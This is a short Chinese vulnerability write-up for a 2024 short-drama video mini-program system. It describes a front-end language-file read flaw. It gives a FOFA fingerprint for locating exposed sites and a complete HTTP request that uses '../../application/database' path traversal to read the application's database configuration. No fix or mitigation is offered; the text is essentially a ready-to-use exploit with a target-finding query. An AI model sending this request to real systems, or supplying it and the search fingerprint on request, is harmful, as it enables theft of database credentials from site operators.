小剧场短剧影视系统存在前台Lang文件读取漏洞
一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.84);"> 2024年最新新版小剧场短剧影视小程序源码+风口项目 ,短剧APP 小程序源码 风口项目 ,小剧场短剧影视系统存在前台Lang文件读取漏洞。</font>
<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
- 小剧场短剧影视系统
三、资产测绘
- fofa
"/VwmRIfEYDH.php"
- 特征
四、漏洞复现
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin